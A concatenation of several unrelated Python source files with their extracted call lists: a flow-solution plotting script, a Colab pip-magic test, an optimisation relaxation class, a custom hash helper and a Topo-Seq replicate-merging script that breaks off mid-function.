print(' ny: ', ny)
print(' nz: ', nz)
print(' nt: ', nt)
# determine extents of plots
minmaxrho = [0.9*rho.min(), 1.1*rho.max()]
if (rho.min() == rho.max()):
minmaxrho = [rho.min()-0.1, rho.max()+0.1]
minmaxmy = [0.9*my.min(), 1.1*my.max()]
if (my.min() == my.max()):
minmaxmy = [my.min()-0.1, my.max()+0.1]
minmaxmz = [0.9*mz.min(), 1.1*mz.max()]
if (mz.min() == mz.max()):
minmaxmz = [mz.min()-0.1, mz.max()+0.1]
minmaxet = [0.9*et.min(), 1.1*et.max()]
if (et.min() == et.max()):
minmaxet = [et.min()-0.1, et.max()+0.1]
# generate plots of solution
for tstep in range(nt):
numfigs = 0
print('time step', tstep+1, 'out of', nt)
# get true solutions
rhotrue, mytrue, mztrue = analytical_solution(tgrid[tstep],ny,nz)
# set string constants for current time, mesh sizes
tstr = repr(tstep)
nystr = repr(ny)
nzstr = repr(nz)
# extract 2D velocity fields (computed and true)
U = my[nx//2,:,:,tstep]/rho[nx//2,:,:,tstep]
Utrue = mytrue/rhotrue
V = mz[nx//2,:,:,tstep]/rho[nx//2,:,:,tstep]
Vtrue = mztrue/rhotrue
speed = np.sqrt(U**2 + V**2)
speedtrue = np.sqrt(Utrue**2 + Vtrue**2)
# set filenames for graphics
rhosurf = 'rho_surface.' + repr(tstep).zfill(4) + '.png'
etsurf = 'et_surface.' + repr(tstep).zfill(4) + '.png'
vstr = 'velocity.' + repr(tstep).zfill(4) + '.png'
rhocont = 'rho_contour.' + repr(tstep).zfill(4) + '.png'
etcont = 'et_contour.' + repr(tstep).zfill(4) + '.png'
rho1dout = 'rho1d.' + repr(tstep).zfill(4) + '.png'
my1dout = 'my1d.' + repr(tstep).zfill(4) + '.png'
mz1dout = 'my1d.' + repr(tstep).zfill(4) + '.png'
sp1dout = 'speed1d.' + repr(tstep).zfill(4) + '.png'
# set y and z meshgrid objects
Y,Z = np.meshgrid(ygrid,zgrid)
# surface plots
numfigs += 1
fig = plt.figure(numfigs)
ax = fig.add_subplot(111, projection='3d')
ax.plot_surface(Y, Z, rho[nx//2,:,:,tstep], rstride=1, cstride=1,
cmap=cm.jet, linewidth=0, antialiased=True, shade=True)
ax.set_xlabel('y'); ax.set_ylabel('z'); ax.set_zlim((minmaxrho[0], minmaxrho[1]))
ax.view_init(elevation,angle)
plt.title(r'$\rho(y,z)$ at output ' + tstr + ', mesh = ' + nystr + 'x' + nzstr)
plt.savefig(rhosurf)
numfigs += 1
fig = plt.figure(numfigs)
ax = fig.add_subplot(111, projection='3d')
ax.plot_surface(Y, Z, et[nx//2,:,:,tstep], rstride=1, cstride=1,
cmap=cm.jet, linewidth=0, antialiased=True, shade=True)
ax.set_xlabel('y'); ax.set_ylabel('z'); ax.set_zlim((minmaxet[0], minmaxet[1]))
ax.view_init(elevation,angle)
plt.title(r'$e_t(y,z)$ at output ' + tstr + ', mesh = ' + nystr + 'x' + nzstr)
plt.savefig(etsurf)
# stream plots
numfigs += 1
fig = plt.figure(numfigs,figsize=(12,4))
ax1 = fig.add_subplot(121)
lw = speed / speed.max()
ax1.streamplot(Y, Z, U, V, color='b', linewidth=lw)
ax1.set_xlabel('y'); ax1.set_ylabel('z'); ax1.set_aspect('equal')
ax2 = fig.add_subplot(122)
lw = speedtrue / speedtrue.max()
ax2.streamplot(Y, Z, Utrue, Vtrue, color='k', linewidth=lw)
ax2.set_xlabel('y'); ax2.set_ylabel('z'); ax2.set_aspect('equal')
plt.suptitle(r'$\mathbf{v}(y,z)$ (left) vs $\mathbf{v}_{true}(y,z)$ (right) at output ' + tstr + ', mesh = ' + nystr + 'x' + nzstr)
plt.savefig(vstr)
# contour plots
# numfigs += 1
# fig = plt.figure(numfigs,figsize=(12,4))
# ax1 = fig.add_subplot(121)
# ax1.contourf(Y, Z, rho[nx//2,:,:,tstep])
# plt.colorbar(); ax1.set_xlabel('y'); ax1.set_ylabel('z'); ax1.set_axis('equal')
# ax2 = fig.add_subplot(122)
# ax2.contourf(Y, Z, rhotrue)
# ax2.colorbar(); ax2.set_xlabel('y'); ax2.set_ylabel('z'); ax2.set_axis('equal')
# plt.suptitle(r'$\rho(y,z)$ (left) vs $\rho_{true}(y,z)$ (right) at output ' + tstr + ', mesh = ' + nystr + 'x' + nzstr)
# plt.savefig(rhocont)
# numfigs += 1
# fig = plt.figure(numfigs)
# plt.contourf(Y, Z, et[nx//2,:,:,tstep])
# plt.colorbar(); plt.xlabel('y'); plt.ylabel('z'); plt.axis('equal')
# plt.title(r'$e_t(y,z)$ at output ' + tstr + ', mesh = ' + nystr + 'x' + nzstr)
# plt.savefig(etcont)
# line/error plots
rho1d = rho[nx//2,:,nz//2,tstep]
my1d = my[nx//2,:,nz//2,tstep]
mz1d = mz[nx//2,:,nz//2,tstep]
sp1d = speed[:,nz//2]
rhotrue1d = rhotrue[:,nz//2]
mytrue1d = mytrue[:,nz//2]
mztrue1d = mztrue[:,nz//2]
sptrue1d = speedtrue[:,nz//2]
numfigs += 1
fig = plt.figure(numfigs,figsize=(12,4))
ax1 = fig.add_subplot(121)
ax1.plot(ygrid,rho1d,'b--',ygrid,rhotrue1d,'k-')
ax1.legend(('computed','analytical'))
ax1.set_xlabel('y'); ax1.set_ylabel(r'$\rho(y)$')
ax2 = fig.add_subplot(122)
ax2.semilogy(ygrid,np.abs(rho1d-rhotrue1d)+1e-16)
ax2.set_xlabel('y'); ax2.set_ylabel(r'$|\rho-\rho_{true}|$')
plt.suptitle(r'$\rho(y)$ and error at output ' + tstr + ', mesh = ' + nystr)
plt.savefig(rho1dout)
numfigs += 1
fig = plt.figure(numfigs,figsize=(12,4))
ax1 = fig.add_subplot(121)
ax1.plot(ygrid,my1d,'b--',ygrid,mytrue1d,'k-')
ax1.legend(('computed','analytical'))
ax1.set_xlabel('y'); ax1.set_ylabel(r'$m_y(y)$')
ax2 = fig.add_subplot(122)
ax2.semilogy(ygrid,np.abs(my1d-mytrue1d)+1e-16)
ax2.set_xlabel('y'); ax2.set_ylabel(r'$|m_y-m_{y,true}|$')
plt.suptitle(r'$m_y(y)$ and error at output ' + tstr + ', mesh = ' + nystr)
plt.savefig(my1dout)
numfigs += 1
fig = plt.figure(numfigs,figsize=(12,4))
ax1 = fig.add_subplot(121)
ax1.plot(ygrid,mz1d,'b--',ygrid,mztrue1d,'k-')
ax1.legend(('computed','analytical'))
ax1.set_xlabel('y'); ax1.set_ylabel(r'$m_z(y)$')
ax2 = fig.add_subplot(122)
ax2.semilogy(ygrid,np.abs(mz1d-mztrue1d)+1e-16)
ax2.set_xlabel('y'); ax2.set_ylabel(r'$|m_z-m_{z,true}|$')
plt.suptitle(r'$m_z(y)$ and error at output ' + tstr + ', mesh = ' + nystr)
plt.savefig(mz1dout)
numfigs += 1
fig = plt.figure(numfigs,figsize=(12,4))
ax1 = fig.add_subplot(121)
ax1.plot(ygrid,sp1d,'b--',ygrid,sptrue1d,'k-')
ax1.legend(('computed','analytical'))
ax1.set_xlabel('y'); ax1.set_ylabel('s(y)')
ax2 = fig.add_subplot(122)
ax2.semilogy(ygrid,np.abs(sp1d-sptrue1d)+1e-16)
ax2.set_xlabel('y'); ax2.set_ylabel(r'$|s-s_{true}|$')
plt.suptitle(r'$s(y)$ and error at output ' + tstr + ', mesh = ' + nystr)
plt.savefig(sp1dout)
if (showplots):
plt.show()
for i in range(1,numfigs+1):
plt.figure(i), plt.close()
##### end of script #####
|
[
"matplotlib.pyplot.title",
"numpy.meshgrid",
"matplotlib.pyplot.show",
"numpy.abs",
"matplotlib.pyplot.suptitle",
"matplotlib.pyplot.close",
"numpy.zeros",
"matplotlib.pyplot.figure",
"matplotlib.pyplot.savefig",
"numpy.sqrt"
] |
[((1092, 1123), 'numpy.zeros', 'np.zeros', (['(ny, nz)'], {'dtype': 'float'}), '((ny, nz), dtype=float)\n', (1100, 1123), True, 'import numpy as np\n'), ((1131, 1162), 'numpy.zeros', 'np.zeros', (['(ny, nz)'], {'dtype': 'float'}), '((ny, nz), dtype=float)\n', (1139, 1162), True, 'import numpy as np\n'), ((1170, 1201), 'numpy.zeros', 'np.zeros', (['(ny, nz)'], {'dtype': 'float'}), '((ny, nz), dtype=float)\n', (1178, 1201), True, 'import numpy as np\n'), ((3275, 3299), 'numpy.sqrt', 'np.sqrt', (['(U ** 2 + V ** 2)'], {}), '(U ** 2 + V ** 2)\n', (3282, 3299), True, 'import numpy as np\n'), ((3312, 3344), 'numpy.sqrt', 'np.sqrt', (['(Utrue ** 2 + Vtrue ** 2)'], {}), '(Utrue ** 2 + Vtrue ** 2)\n', (3319, 3344), True, 'import numpy as np\n'), ((4001, 4026), 'numpy.meshgrid', 'np.meshgrid', (['ygrid', 'zgrid'], {}), '(ygrid, zgrid)\n', (4012, 4026), True, 'import numpy as np\n'), ((4074, 4093), 'matplotlib.pyplot.figure', 'plt.figure', (['numfigs'], {}), '(numfigs)\n', (4084, 4093), True, 'import matplotlib.pyplot as plt\n'), ((4412, 4491), 'matplotlib.pyplot.title', 'plt.title', (["('$\\\\rho(y,z)$ at output ' + tstr + ', mesh = ' + nystr + 'x' + nzstr)"], {}), "('$\\\\rho(y,z)$ at output ' + tstr + ', mesh = ' + nystr + 'x' + nzstr)\n", (4421, 4491), True, 'import matplotlib.pyplot as plt\n'), ((4496, 4516), 'matplotlib.pyplot.savefig', 'plt.savefig', (['rhosurf'], {}), '(rhosurf)\n', (4507, 4516), True, 'import matplotlib.pyplot as plt\n'), ((4545, 4564), 'matplotlib.pyplot.figure', 'plt.figure', (['numfigs'], {}), '(numfigs)\n', (4555, 4564), True, 'import matplotlib.pyplot as plt\n'), ((4880, 4957), 'matplotlib.pyplot.title', 'plt.title', (["('$e_t(y,z)$ at output ' + tstr + ', mesh = ' + nystr + 'x' + nzstr)"], {}), "('$e_t(y,z)$ at output ' + tstr + ', mesh = ' + nystr + 'x' + nzstr)\n", (4889, 4957), True, 'import matplotlib.pyplot as plt\n'), ((4963, 4982), 'matplotlib.pyplot.savefig', 'plt.savefig', (['etsurf'], {}), '(etsurf)\n', (4974, 4982), True, 'import matplotlib.pyplot as plt\n'), ((5034, 5070), 'matplotlib.pyplot.figure', 'plt.figure', (['numfigs'], {'figsize': '(12, 4)'}), '(numfigs, figsize=(12, 4))\n', (5044, 5070), True, 'import matplotlib.pyplot as plt\n'), ((5461, 5603), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (["(\n '$\\\\mathbf{v}(y,z)$ (left) vs $\\\\mathbf{v}_{true}(y,z)$ (right) at output '\n + tstr + ', mesh = ' + nystr + 'x' + nzstr)"], {}), "(\n '$\\\\mathbf{v}(y,z)$ (left) vs $\\\\mathbf{v}_{true}(y,z)$ (right) at output '\n + tstr + ', mesh = ' + nystr + 'x' + nzstr)\n", (5473, 5603), True, 'import matplotlib.pyplot as plt\n'), ((5597, 5614), 'matplotlib.pyplot.savefig', 'plt.savefig', (['vstr'], {}), '(vstr)\n', (5608, 5614), True, 'import matplotlib.pyplot as plt\n'), ((6804, 6840), 'matplotlib.pyplot.figure', 'plt.figure', (['numfigs'], {'figsize': '(12, 4)'}), '(numfigs, figsize=(12, 4))\n', (6814, 6840), True, 'import matplotlib.pyplot as plt\n'), ((7173, 7249), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (["('$\\\\rho(y)$ and error at output ' + tstr + ', mesh = ' + nystr)"], {}), "('$\\\\rho(y)$ and error at output ' + tstr + ', mesh = ' + nystr)\n", (7185, 7249), True, 'import matplotlib.pyplot as plt\n'), ((7254, 7275), 'matplotlib.pyplot.savefig', 'plt.savefig', (['rho1dout'], {}), '(rho1dout)\n', (7265, 7275), True, 'import matplotlib.pyplot as plt\n'), ((7308, 7344), 'matplotlib.pyplot.figure', 'plt.figure', (['numfigs'], {'figsize': '(12, 4)'}), '(numfigs, figsize=(12, 4))\n', (7318, 7344), True, 'import matplotlib.pyplot as plt\n'), ((7670, 7744), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (["('$m_y(y)$ and error at output ' + tstr + ', mesh = ' + nystr)"], {}), "('$m_y(y)$ and error at output ' + tstr + ', mesh = ' + nystr)\n", (7682, 7744), True, 'import matplotlib.pyplot as plt\n'), ((7750, 7770), 'matplotlib.pyplot.savefig', 'plt.savefig', (['my1dout'], {}), '(my1dout)\n', (7761, 7770), True, 'import matplotlib.pyplot as plt\n'), ((7803, 7839), 'matplotlib.pyplot.figure', 'plt.figure', (['numfigs'], {'figsize': '(12, 4)'}), '(numfigs, figsize=(12, 4))\n', (7813, 7839), True, 'import matplotlib.pyplot as plt\n'), ((8165, 8239), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (["('$m_z(y)$ and error at output ' + tstr + ', mesh = ' + nystr)"], {}), "('$m_z(y)$ and error at output ' + tstr + ', mesh = ' + nystr)\n", (8177, 8239), True, 'import matplotlib.pyplot as plt\n'), ((8245, 8265), 'matplotlib.pyplot.savefig', 'plt.savefig', (['mz1dout'], {}), '(mz1dout)\n', (8256, 8265), True, 'import matplotlib.pyplot as plt\n'), ((8294, 8330), 'matplotlib.pyplot.figure', 'plt.figure', (['numfigs'], {'figsize': '(12, 4)'}), '(numfigs, figsize=(12, 4))\n', (8304, 8330), True, 'import matplotlib.pyplot as plt\n'), ((8647, 8719), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (["('$s(y)$ and error at output ' + tstr + ', mesh = ' + nystr)"], {}), "('$s(y)$ and error at output ' + tstr + ', mesh = ' + nystr)\n", (8659, 8719), True, 'import matplotlib.pyplot as plt\n'), ((8725, 8745), 'matplotlib.pyplot.savefig', 'plt.savefig', (['sp1dout'], {}), '(sp1dout)\n', (8736, 8745), True, 'import matplotlib.pyplot as plt\n'), ((1067, 1083), 'numpy.sqrt', 'np.sqrt', (['p0prime'], {}), '(p0prime)\n', (1074, 1083), True, 'import numpy as np\n'), ((8777, 8787), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (8785, 8787), True, 'import matplotlib.pyplot as plt\n'), ((1347, 1369), 'numpy.sqrt', 'np.sqrt', (['(y * y + z * z)'], {}), '(y * y + z * z)\n', (1354, 1369), True, 'import numpy as np\n'), ((7073, 7098), 'numpy.abs', 'np.abs', (['(rho1d - rhotrue1d)'], {}), '(rho1d - rhotrue1d)\n', (7079, 7098), True, 'import numpy as np\n'), ((7574, 7597), 'numpy.abs', 'np.abs', (['(my1d - mytrue1d)'], {}), '(my1d - mytrue1d)\n', (7580, 7597), True, 'import numpy as np\n'), ((8069, 8092), 'numpy.abs', 'np.abs', (['(mz1d - mztrue1d)'], {}), '(mz1d - mztrue1d)\n', (8075, 8092), True, 'import numpy as np\n'), ((8555, 8578), 'numpy.abs', 'np.abs', (['(sp1d - sptrue1d)'], {}), '(sp1d - sptrue1d)\n', (8561, 8578), True, 'import numpy as np\n'), ((8827, 8840), 'matplotlib.pyplot.figure', 'plt.figure', (['i'], {}), '(i)\n', (8837, 8840), True, 'import matplotlib.pyplot as plt\n'), ((8842, 8853), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (8851, 8853), True, 'import matplotlib.pyplot as plt\n'), ((1749, 1769), 'numpy.sqrt', 'np.sqrt', (['(2 * p0prime)'], {}), '(2 * p0prime)\n', (1756, 1769), True, 'import numpy as np\n'), ((1768, 1804), 'numpy.sqrt', 'np.sqrt', (['(r * r - 2 * t * t * p0prime)'], {}), '(r * r - 2 * t * t * p0prime)\n', (1775, 1804), True, 'import numpy as np\n'), ((1885, 1905), 'numpy.sqrt', 'np.sqrt', (['(2 * p0prime)'], {}), '(2 * p0prime)\n', (1892, 1905), True, 'import numpy as np\n'), ((1904, 1940), 'numpy.sqrt', 'np.sqrt', (['(r * r - 2 * t * t * p0prime)'], {}), '(r * r - 2 * t * t * p0prime)\n', (1911, 1940), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
# Copyright 2018 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the google.colab._installation_commands package."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import unittest
import IPython
from IPython.utils import io
from google.colab import load_ipython_extension
MOCKED_COMMANDS = {
'pip install pandas':
"""
Requirement already satisfied: pandas in /usr/local/lib/python2.7/dist-packages (0.22.0)
Requirement already satisfied: pytz>=2011k in /usr/local/lib/python2.7/dist-packages (from pandas) (2018.9)
Requirement already satisfied: python-dateutil in /usr/local/lib/python2.7/dist-packages (from pandas) (2.5.3)
Requirement already satisfied: numpy>=1.9.0 in /usr/local/lib/python2.7/dist-packages (from pandas) (1.16.2)
Requirement already satisfied: six>=1.5 in /usr/local/lib/python2.7/dist-packages (from python-dateutil->pandas) (1.11.0)
""",
'pip install -U numpy':
"""
Collecting numpy
Downloading https://files.pythonhosted.org/packages/c4/33/8ec8dcdb4ede5d453047bbdbd01916dbaccdb63e98bba60989718f5f0876/numpy-1.16.2-cp27-cp27mu-manylinux1_x86_64.whl (17.0MB)
100% |============================| 17.0MB 660kB/s
fastai 0.7.0 has requirement torch<0.4, but you'll have torch 1.0.1.post2 which is incompatible.
albumentations 0.1.12 has requirement imgaug<0.2.7,>=0.2.5, but you'll have imgaug 0.2.8 which is incompatible.
featuretools 0.4.1 has requirement pandas>=0.23.0, but you'll have pandas 0.22.0 which is incompatible.
Installing collected packages: numpy
Found existing installation: numpy 1.14.6
Uninstalling numpy-1.14.6:
Successfully uninstalled numpy-1.14.6
Successfully installed numpy-1.16.2
"""
}
class MockInteractiveShell(IPython.InteractiveShell):
"""Interactive shell that mocks some commands."""
def system(self, cmd):
if cmd in MOCKED_COMMANDS:
sys.stderr.write('')
sys.stdout.write(MOCKED_COMMANDS[cmd])
self.user_ns['_exit_code'] = 0
else:
return super(MockInteractiveShell, self).system(cmd)
class InstallationCommandsTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(InstallationCommandsTest, cls).setUpClass()
cls.ip = MockInteractiveShell()
load_ipython_extension(cls.ip)
def testPipMagicPandas(self):
output = self.run_cell('%pip install pandas')
self.assertEqual([], output.outputs)
self.assertEqual('', output.stderr)
self.assertIn('pandas', output.stdout)
def testPipMagicNumpy(self):
output = self.run_cell('%pip install -U numpy')
self.assertEqual([], output.outputs)
self.assertEqual('', output.stderr)
self.assertIn('numpy', output.stdout)
def run_cell(self, cell_contents):
with io.capture_output() as captured:
self.ip.run_cell(cell_contents)
return captured
|
[
"sys.stdout.write",
"sys.stderr.write",
"IPython.utils.io.capture_output",
"google.colab.load_ipython_extension"
] |
[((2828, 2858), 'google.colab.load_ipython_extension', 'load_ipython_extension', (['cls.ip'], {}), '(cls.ip)\n', (2850, 2858), False, 'from google.colab import load_ipython_extension\n'), ((2470, 2490), 'sys.stderr.write', 'sys.stderr.write', (['""""""'], {}), "('')\n", (2486, 2490), False, 'import sys\n'), ((2497, 2535), 'sys.stdout.write', 'sys.stdout.write', (['MOCKED_COMMANDS[cmd]'], {}), '(MOCKED_COMMANDS[cmd])\n', (2513, 2535), False, 'import sys\n'), ((3320, 3339), 'IPython.utils.io.capture_output', 'io.capture_output', ([], {}), '()\n', (3337, 3339), False, 'from IPython.utils import io\n')]
|
# Copyright 2018 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A relaxation that removes integrality constraints on variables."""
from galini.core import Variable, Domain
from galini.relaxations.relaxation import Relaxation, RelaxationResult
class ContinuousRelaxation(Relaxation):
def relaxed_problem_name(self, problem):
return problem.name + '_continuous'
def relax_variable(self, problem, variable):
return Variable(
variable.name,
problem.lower_bound(variable),
problem.upper_bound(variable),
Domain.REAL,
)
def relax_objective(self, problem, objective):
return RelaxationResult(objective)
def relax_constraint(self, problem, constraint):
return RelaxationResult(constraint)
|
[
"galini.relaxations.relaxation.RelaxationResult"
] |
[((1175, 1202), 'galini.relaxations.relaxation.RelaxationResult', 'RelaxationResult', (['objective'], {}), '(objective)\n', (1191, 1202), False, 'from galini.relaxations.relaxation import Relaxation, RelaxationResult\n'), ((1272, 1300), 'galini.relaxations.relaxation.RelaxationResult', 'RelaxationResult', (['constraint'], {}), '(constraint)\n', (1288, 1300), False, 'from galini.relaxations.relaxation import Relaxation, RelaxationResult\n')]
|
from math import sin
from wsgi import HASH_SALT
def calculate_hash(data: str) -> str:
return _calculate_inner(HASH_SALT + data)
def _calculate_inner(data: str) -> str:
A = 0x12345678
B = 0x9ABCDEF0
C = 0xDEADDEAD
D = 0xC0FEC0FE
E = 0xFEEDBEAF
X = [int(0xFFFFFFFF * sin(i)) & 0xFFFFFFFF for i in range(256)]
def F(X, Y, Z):
return ((~X & Z) | (~X & Z)) & 0xFFFFFFFF
def G(X, Y, Z):
return ((X & Z) | (~Z & Y)) & 0xFFFFFFFF
def H(X, Y, Z):
return (X ^ Y ^ Z) & 0xFFFFFFFF
def I(X, Y, Z):
return (Y ^ (~Z | X)) & 0xFFFFFFFF
def ROL(X, Y):
return (X << Y | X >> (32 - Y)) & 0xFFFFFFFF
for i, ch in enumerate(data):
k, l = ord(ch), i & 0x1f
A = (B + ROL(A + F(B, C, D) + X[k], l)) & 0xFFFFFFFF
B = (C + ROL(B + G(C, D, E) + X[k], l)) & 0xFFFFFFFF
C = (D + ROL(C + H(E, A, B) + X[k], l)) & 0xFFFFFFFF
D = (E + ROL(D + I(C, D, E) + X[k], l)) & 0xFFFFFFFF
E = (A + ROL(E + F(A, B, C) + X[k], l)) & 0xFFFFFFFF
return "".join([hex(x)[2:].zfill(8) for x in [A, B, C, D, E]])
|
[
"math.sin"
] |
[((297, 303), 'math.sin', 'sin', (['i'], {}), '(i)\n', (300, 303), False, 'from math import sin\n')]
|
###############################################
##<NAME>, 2018##
##Topo-Seq analysis##
#The script takes raw GCSs data, returns only trusted GCSs,
#computes GCSs shared between different conditions,
#draws Venn diagrams of the sets overlappings,
#writes GCSs sets.
###############################################
#######
#Packages to be imported.
#######
import os
import matplotlib.pyplot as plt
import collections
from matplotlib_venn import venn2, venn3, venn3_circles
import numpy as np
#######
#Variables to be defined.
#######
print('Variables to be defined:')
#Path to the working directory
pwd="C:\\Users\sutor\OneDrive\ThinkPad_working\Sutor\Science\TopoI-ChIP-Seq\TopA_ChIP-Seq\EcTopoI_G116S_M320V_Topo-Seq\TCS_motifs\\"
#Input data
path_to_replicas={'TopoI_Topo_Seq_1': {'Ara' : pwd + "Replics_1_2_3_Thresholds\TopoI_Topo_Seq_1_Ara_TCSs_called_thr_15.BroadPeak", 'No_Ara' : pwd + "Replics_1_2_3_Thresholds\TopoI_Topo_Seq_1_no_Ara_TCSs_called_thr_15.BroadPeak"},
'TopoI_Topo_Seq_2': {'Ara' : pwd + "Replics_1_2_3_Thresholds\TopoI_Topo_Seq_2_Ara_TCSs_called_thr_15.BroadPeak", 'No_Ara' : pwd + "Replics_1_2_3_Thresholds\TopoI_Topo_Seq_2_no_Ara_TCSs_called_thr_15.BroadPeak"},
'TopoI_Topo_Seq_3': {'Ara' : pwd + "Replics_1_2_3_Thresholds\TopoI_Topo_Seq_3_Ara_TCSs_called_thr_15.BroadPeak", 'No_Ara' : pwd + "Replics_1_2_3_Thresholds\TopoI_Topo_Seq_3_no_Ara_TCSs_called_thr_15.BroadPeak"}}
#Configuration of the output for the GCSs data in replicas.
Replicas_path_out="C:\\Users\sutor\OneDrive\ThinkPad_working\Sutor\Science\TopoI-ChIP-Seq\TopA_ChIP-Seq\EcTopoI_G116S_M320V_Topo-Seq\TCS_motifs\\Replicas_1_2_3_Tresholds_trusted_TCSs\\"
if not os.path.exists(Replicas_path_out):
os.makedirs(Replicas_path_out)
Set_name="Thr_15"
All_conditions_name="TopoI_Topo_Seq_123_TCSs_merged"
#Configuration of the output for GCSs trusted.
Out_path=Replicas_path_out + "TopoI_Topo_Seq_123_TCSs_called_thr_15.BroadPeak"
#Outpath for Venn diagrams.
plot_outpath=Replicas_path_out
#######
#Parsing raw GCSs coordinates, returns dictionary - GCSs_coordinate:N3E.
#######
def read_GCSs_file(GCSs_file_path):
GCSs_dict={}
GCSs_in=open(GCSs_file_path, 'r')
for line in GCSs_in:
line=line.rstrip().split('\t')
if line[0] not in ['GCSs_coordinate']:
GCSs_dict[int(line[1])]=float(line[6])
GCSs_in.close()
return GCSs_dict
#######
#Filter controls.
#######
def filter_controls(replicas_path_dict):
#Merges a range of replicates
TCSs_replicas_dict={}
for set_name, set_pair in replicas_path_dict.items(): #Iterates replicas
#Read files with raw GCSs
Raw_TCSs_dict_Ara=read_GCSs_file(set_pair['Ara'])
Raw_TCSs_dict_no_Ara=read_GCSs_file(set_pair['No_Ara'])
Raw_TCSs_dict_Ara_filtered={}
for TCS_coordinate, TCS_signal in Raw_TCSs_dict_Ara.items():
if TCS_coordinate not in Raw_TCSs_dict_no_Ara:
Raw_TCSs_dict_Ara_filtered[TCS_coordinate]=TCS_signal
TCSs_replicas_dict[set_name]=Raw_TCSs_dict_Ara_filtered
return TCSs_replicas_dict
#######
#Combines replicates into one GCSs table.
#######
def combine_replicates(replicas_path_dict, path_out, name):
#Filter controls.
TCSs_replicas_dict=filter_controls(replicas_path_dict)
#Merges a range of replicates
GCSs_replicas_dict={}
names_ar=[]
for key, Raw_GCSs_dict in TCSs_replicas_dict.items(): #Iterates replicas
names_ar.append(key)
for k, v in Raw_GCSs_dict.items(): #Iterates raw GCSs
#Table filling process initiation
if len(names_ar)==1:
GCSs_replicas_dict[k]=[v]
#Table filling process continuing (the table already contains at least one GCSs set)
else:
#If GCSs is already in the table
if k in GCSs_replicas_dict:
GCSs_replicas_dict[k].append(v)
#If this is the first occurrence of the element in a NON empty table.
else:
add_el=[]
for j in range(len(names_ar)-1):
add_el.append(0)
add_el.append(v)
GCSs_replicas_dict[k]=add_el
#If table body line contains less elements than header does, hence add zero.
for k, v in GCSs_replicas_dict.items():
if len(v)<len(names_ar):
GCSs_replicas_dict[k].append(0)
#Sorting the list of dictionary keys.
GCSs_replicas_dict_sorted=collections.OrderedDict(sorted(GCSs_replicas_dict.items()))
#Writes merged GCSs data
fileout=open(f'{path_out}{name}_TCSs_replicates.txt', 'w')
#TCSs_out.write(f'{Genome_ID}\t{TCSs_list_F[i][0]}\t{TCSs_list_F[i][0]+1}\tTCS_{i}_F\t10\t.\t{TCSs_list_F[i][1]}\t-1\t-1\n')
#Header
fileout.write('TCSs_coordinate\t')
for i in names_ar:
fileout.write(str(i) + '_N3E\t')
fileout.write('\n')
#Body of the table
for k, v in GCSs_replicas_dict_sorted.items():
fileout.write(str(k) + '\t')
for i in GCSs_replicas_dict_sorted[k]:
fileout.write(str(i) + '\t')
fileout.write('\n')
fileout.close()
return GCSs_replicas_dict
#Prepares GCSs table for all conditions
#combine_replicates(path_to_replicas, Replicas_path_out, All_conditions_name)
#######
#Returns only trusted GCSs - observed at least 2 times within 3 biological replicates.
#Data organization: 1. coordinate of GCSs, 2.-4. N3E values for biological replicates 1-3
#######
def trusted(ar):
av_height=0
ind=0
for i in range(len(ar)):
if ar[i]>0:
ind=ind+1
av_height=av_height+ar[i]
if ind>1:
return av_height/ind
else:
return "No signal"
def trusted_GCSs_calling(GCSs_dictionary):
ar=[]
for k, v in GCSs_dictionary.items():
if trusted(v)!="No signal":
ar.append([k, trusted(v)])
return ar
def replicas_comb_trust_wrapper(replicas_dict, path_out, name):
print('Now working with: ' + str(name))
cur_GCSs_dict=combine_replicates(replicas_dict, path_out, name)
cur_GCSs_trusted=trusted_GCSs_calling(cur_GCSs_dict)
print('Number of trusted TCSs for ' + str(name) + ' : ' + str(len(cur_GCSs_trusted)))
return cur_GCSs_trusted
TCSs_trusted=replicas_comb_trust_wrapper(path_to_replicas, Replicas_path_out, All_conditions_name)
#Antibs_GCSs_sets=[Cfx, RifCfx, Micro, Oxo]
#######
#GCSs shared between pairs of antibiotics - Cfx, Micro and Oxo and between Cfx and RifCfx.
#######
def pairs_construction(ar1, ar2):
double=[]
for i in range(len(ar1)):
for j in range(len(ar2)):
if ar1[i][0]==ar2[j][0]:
double.append([ar1[i][0], ar1[i][1], ar2[j][1]]) #GCSs coordinate, N3E_1, N3E_2
return double
#Cfx_RifCfx_shared_GCSs=pairs_construction(Cfx, RifCfx)
#print('Number of GCSs shared between Cfx and RifCfx: ' + str(len(Cfx_RifCfx_shared_GCSs)) + '\n')
#
#Cfx_Micro_shared_GCSs=pairs_construction(Cfx, Micro)
#Cfx_Oxo_shared_GCSs=pairs_construction(Cfx, Oxo)
#Micro_Oxo_shared_GCSs=pairs_construction(Micro, Oxo)
#
#print('Number of GCSs shared between Cfx and Micro: ' + str(len(Cfx_Micro_shared_GCSs)))
#print('Number of GCSs shared between Cfx and Oxo: ' + str(len(Cfx_Oxo_shared_GCSs)))
#print('Number of GCSs shared between Micro and Oxo: ' + str(len(Micro_Oxo_shared_GCSs)) + '\n')
#
#Antibs_GCSs_sets_pair_shared=[Cfx_Micro_shared_GCSs, Cfx_Oxo_shared_GCSs, Micro_Oxo_shared_GCSs]
#######
#GCSs shared between 3 antibiotics
#######
def triple_construction(ar12, ar3):
triple=[]
for i in range(len(ar12)):
for j in range(len(ar3)):
